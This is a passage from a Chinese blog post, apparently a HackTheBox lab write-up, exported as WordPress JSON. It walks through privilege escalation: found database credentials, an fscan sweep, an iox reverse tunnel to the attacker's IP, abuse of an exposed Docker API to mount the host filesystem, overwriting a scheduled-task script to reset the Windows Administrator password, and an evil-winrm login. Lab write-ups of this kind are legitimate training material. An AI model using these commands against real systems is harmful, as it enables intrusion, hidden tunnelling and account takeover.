\/><\/p>\n<p>\u6210\u529f\u53d1\u73b0<code>MySQL<\/code>\u7528\u6237\u51ed\u636e\uff1a<\/p>\n<ul>\n<li>\u670d\u52a1\u5668\u5730\u5740\uff1a<code>mariadb<\/code><\/li>\n<li>\u7528\u6237\u540d\uff1a<code>cactidbuser<\/code><\/li>\n<li>\u5bc6\u7801\uff1a<code>7pyrf6ly8qx<\/code><\/li>\n<\/ul>\n<p>\u9664\u6b64\u4e4b\u5916\uff0c\u8fd8\u5728<code>\/etc\/resolv.conf<\/code>\u914d\u7f6e\u6587\u4ef6\u5185\u53d1\u73b0\u4e86\u4e00\u4e9b\u6ce8\u91ca\uff0c\u6ce8\u91ca\u5185\u5b58\u5728\u5185\u7f51<code>IP<\/code>\u5730\u5740\uff1a<code>192.168.65.7<\/code>\uff0c\u8be5<code>IP<\/code>\u5730\u5740\u8fd8\u88ab\u63cf\u8ff0\u4e3a\u989d\u5916\u7684\u5185\u7f51<code>DNS<\/code>\u670d\u52a1\u5668\uff1a<\/p>\n<pre><code class=\"language-shell\">cat \/etc\/resolv.conf<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765367405630-865b0de6-4d90-4b13-b089-3a0ce17ea4c8.png\" alt=\"\" \/><\/p>\n<p>\u5c1d\u8bd5\u4e0a\u4f20<code>fscan<\/code>\u5de5\u5177\u5bf9\u8be5<code>IP<\/code>\u8fdb\u884c<code>TCP<\/code>\u626b\u63cf\uff1a<a href=\"https:\/\/github.com\/shadow1ng\/fscan\" target=\"_blank\"  rel=\"nofollow\" >GitHub - shadow1ng\/fscan: \u4e00\u6b3e\u5185\u7f51\u7efc\u5408\u626b\u63cf\u5de5\u5177\uff0c\u65b9\u4fbf\u4e00\u952e\u81ea\u52a8\u5316\u3001\u5168\u65b9\u4f4d\u6f0f\u626b\u626b\u63cf\u3002<\/a><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765367586663-01b846cd-4674-4835-9282-1c8f859091f6.png\" alt=\"\" \/><\/p>\n<pre><code class=\"language-shell\">.\/fscan -h 192.168.65.7 -p 1-65535 -nopoc -nobr<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765367761548-93d0971a-191c-47c6-baeb-047364fbd900.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u8be5<code>IP<\/code>\u5f00\u653e\u4e86<code>53\/dns<\/code>\u548c<code>2375\/tcp<\/code>\u7aef\u53e3\uff0c\u7591\u4f3c\u4e3a<code>Docker<\/code>\u5bbf\u4e3b\u673a\uff0c\u4e14<code>2375\/tcp<\/code>\u7aef\u53e3\u4e3a<code>Docker WebAPI<\/code>\u9ed8\u8ba4\u7aef\u53e3\u3002<\/p>\n<p>\u7ecf\u5206\u6790\u7814\u5224\uff0c\u8ba4\u4e3a\u5185\u7f51\u670d\u52a1<code>tcp:\/\/192.168.65.7:2375<\/code>\u9ad8\u5ea6\u7591\u4f3c<code>Docker WebAPI<\/code>\u670d\u52a1\uff0c\u51b3\u5b9a\u901a\u8fc7\u8be5\u7aef\u53e3\u8fdb\u884c\u63d0\u6743\u3002<\/p>\n<h2>Docker WebAPI\u63d0\u6743<\/h2>\n<p>\u5728\u76ee\u5f55\u4fe1\u606f\u6536\u96c6\u8fc7\u7a0b\u4e2d\uff0c\u6211\u4eec\u5df2\u7ecf\u53d1\u73b0\u4e86\u5185\u7f51<code>IP<\/code>\u5730\u5740<code>192.168.65.7<\/code>\uff0c\u4e14\u8be5<code>IP<\/code>\u5730\u5740\u7591\u4f3c\u4e3a<code>Docker<\/code>\u5bbf\u4e3b\u673a\uff0c\u8fd8\u5f00\u653e\u4e86<code>DNS<\/code>\u670d\u52a1\u548c<code>2375\/tcp<\/code>\u7aef\u53e3\uff0c\u73b0\u5728\u5c1d\u8bd5\u5229\u7528<code>2375\/tcp<\/code>\u7aef\u53e3\u63d0\u6743\u3002<\/p>\n<p>\u9996\u5148\u4e0a\u4f20<code>iox<\/code>\u5de5\u5177\uff0c\u5c06\u53ef\u7591\u7aef\u53e3\u8f6c\u53d1\u5230\u672c\u5730\uff1a<a href=\"https:\/\/github.com\/EddieIvan01\/iox\" target=\"_blank\"  rel=\"nofollow\" >GitHub - EddieIvan01\/iox: Tool for port forwarding &amp; intranet proxy<\/a><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765368371959-50a7224d-84f9-4ea1-b9b2-c5f041a8cbe5.png\" alt=\"\" \/><\/p>\n<pre><code class=\"language-shell\"># \u653b\u51fb\u673a\u6267\u884c\n.\/iox fwd -l *2222 -l 2375 -k 314159\n# \u9776\u673a\u6267\u884c\n.\/iox fwd -r 192.168.65.7:2375 -r *10.10.14.41:2222 -k 314159 &amp;<\/code><\/pre>\n<p>\u6210\u529f\u8f6c\u53d1\u7aef\u53e3\u540e\uff0c\u4f7f\u7528<code>docker<\/code>\u8fde\u63a5<code>API<\/code>\uff0c\u67e5\u770b\u670d\u52a1\u7aef<code>Docker<\/code>\u7248\u672c\uff1a<\/p>\n<pre><code class=\"language-shell\">docker -H tcp:\/\/127.0.0.1:2375 version<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765368776472-f3fdca1e-aa48-47e8-9e35-0d8c1ce59ead.png\" alt=\"\" \/><\/p>\n<p>\u8fde\u63a5\u6210\u529f\uff01\u53d1\u73b0<code>Docker Engine<\/code>\u7248\u672c\u4e3a<code>28.3.5<\/code>\u3002\u5c1d\u8bd5\u5217\u51fa\u8fd0\u884c\u7684\u5bb9\u5668\uff1a<\/p>\n<pre><code class=\"language-shell\">docker -H tcp:\/\/127.0.0.1:2375 ps<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765368865202-62f88a6b-60b5-4cfb-8ddb-f985ba2395ed.png\" alt=\"\" \/><\/p>\n<p>\u9776\u673a\u8fd0\u884c\u4e86<code>2<\/code>\u4e2a<code>Docker<\/code>\u5bb9\u5668\uff0c\u4e00\u4e2a\u8fd0\u884c\u7f51\u7ad9\u670d\u52a1\uff0c\u53e6\u4e00\u4e2a\u8fd0\u884c\u6570\u636e\u5e93\u670d\u52a1\u3002\u67e5\u770b\u5bfc\u5165\u7684\u7cfb\u7edf\u955c\u50cf\uff1a<\/p>\n<pre><code class=\"language-shell\">docker -H tcp:\/\/127.0.0.1:2375 images<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765368964705-917a2e1b-022e-4082-842d-b4137fcfa612.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u5b58\u5728\u7cbe\u7b80\u7248\u7684<code>Alpine Linux<\/code>\u7cfb\u7edf\u955c\u50cf\uff01\u76f4\u63a5\u65b0\u5efa<code>Docker<\/code>\u5bb9\u5668\uff0c\u5c06\u5bbf\u4e3b\u673a\u6839\u76ee\u5f55\u6302\u8f7d\u8fdb<code>Docker<\/code>\u5bb9\u5668\uff1a<\/p>\n<pre><code class=\"language-shell\">docker -H tcp:\/\/127.0.0.1:2375 run -v \/:\/mnt --rm -it alpine chroot \/mnt \/bin\/bash<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765369177410-2d841bc9-eb45-4f3d-addf-77dafc92c725.png\" alt=\"\" \/><\/p>\n<p>\u521b\u5efa\u6210\u529f\uff01\u76f4\u63a5\u8fdb\u5165<code>\/mnt<\/code>\u76ee\u5f55\u67e5\u770b\uff1a<\/p>\n<pre><code class=\"language-shell\">ls -lA \/mnt<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765369256646-841513f1-609e-4c53-8d1a-69fc3cad8a04.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u5b58\u5728<code>host<\/code>\u5b50\u76ee\u5f55\uff0c\u7ee7\u7eed\u67e5\u770b\uff0c\u5728<code>\/mnt\/host\/c\/<\/code>\u76ee\u5f55\u4e0b\uff0c\u53d1\u73b0<code>Docker<\/code>\u5c06<code>Windows<\/code>\u7cfb\u7edf\u6839\u76ee\u5f55\u6302\u8f7d\u4e86\u8fdb\u6765\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765369371023-68d2247c-a7ef-4290-9245-c37200a36988.png\" alt=\"\" \/><\/p>\n<p>\u5c1d\u8bd5\u67e5\u770b<code>Windows<\/code>\u7cfb\u7edf\u8ba1\u5212\u4efb\u52a1\u914d\u7f6e\u76ee\u5f55\uff1a<code>C:\\Windows\\System32\\tasks\\<\/code><\/p>\n<pre><code class=\"language-shell\">ls -lA Windows\/System32\/tasks<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765370419242-18ca7e3a-307a-47b3-a4a4-7d962d6837ff.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u7cfb\u7edf\u7ba1\u7406\u5458\u914d\u7f6e\u4e86\u591a\u4e2a\u8ba1\u5212\u4efb\u52a1\uff0c\u5176\u4e2d\u4f3c\u4e4e\u5305\u62ec\u4e86\u6e05\u9664<code>Docker<\/code>\u5bb9\u5668\u7684\u4efb\u52a1\uff1a<\/p>\n<pre><code class=\"language-shell\">cat Windows\/System32\/tasks\/Clean_Containers<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765370557779-e536dde8-1bb8-4a4d-8c41-06ffa0f80928.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u7cfb\u7edf\u6bcf\u9694<code>3<\/code>\u5206\u949f\u5c31\u4f1a\u6267\u884c<code>C:\\Users\\Administrator\\Documents\\container_cleanup.ps1<\/code>\u811a\u672c\uff0c\u76f4\u63a5\u5bf9\u8be5\u811a\u672c\u8fdb\u884c\u8986\u76d6\u5199\u5165\uff1a<\/p>\n<pre><code class=\"language-shell\">echo \"net user Administrator Asd310056\" &gt; .\/Users\/Administrator\/Documents\/container_cleanup.ps1\necho \"whoami \/all &gt; C:\\whoami.txt\" &gt;&gt; .\/Users\/Administrator\/Documents\/container_cleanup.ps1<\/code><\/pre>\n<p>\u7b49\u5f85\u4e00\u4f1a\u513f\u540e\uff0c\u53d1\u73b0\u653b\u51fb\u673a\u548c<code>Docker<\/code>\u5bb9\u5668\u7684\u8fde\u63a5\u65ad\u5f00\u4e86\u3002\u518d\u6b21\u521b\u5efa\u5bb9\u5668\u67e5\u770b\uff0c\u53d1\u73b0\u8ba1\u5212\u4efb\u52a1\u5728<code>\/mnt\/host\/c\/<\/code>\u76ee\u5f55\u4e0b\u6210\u529f\u521b\u5efa\u4e86<code>whoami.txt<\/code>\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-shell\">cat \/mnt\/host\/c\/whoami.txt<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765371113988-b19c8db1-6db4-4dcf-96d1-f2f6f41180eb.png\" alt=\"\" \/><\/p>\n<p>\u4fee\u6539<code>Windows<\/code>\u7ba1\u7406\u5458\u5bc6\u7801\u6210\u529f\uff01\u76f4\u63a5\u4f7f\u7528<code>evil-winrm<\/code>\u767b\u5f55\uff1a<\/p>\n<pre><code class=\"language-shell\">evil-winrm -i monitorsfour.htb -u Administrator -p \"Asd310056\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765372358489-c308afad-8067-49bd-a1b7-df5be9d1f192.png\" alt=\"\" \/><\/p>\n<p><strong>\u63d0\u6743\u6210\u529f\uff01\uff01\uff01\uff01<\/strong><\/p>\n<hr \/>\n<h1>\u672c\u6b21\u9776\u673a\u6e17\u900f\u5230\u6b64\u7ed3\u675f<\/h1>\n","protected":false},"excerpt":{"rendered":"<p>\u76ee\u6807\u4fe1\u606f IP\u5730\u5740\uff1a10.129.45.174\uff08\u975e\u56fa\u5b9aIP\u5730\u5740\uff09 \u4fe1\u606f\u6536\u96c6 ICMP\u68c0\u6d4b PING 10.129.45.174 ( &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[19,13],"tags":[],"class_list":["post-355","post","type-post","status-publish","format-standard","hentry","category-htb_season_9","category-windows_machine"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/355","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=355"}],"version-history":[{"count":1,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/355\/revisions"}],"predecessor-version":[{"id":356,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/355\/revisions\/356"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=355"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=355"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=355"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}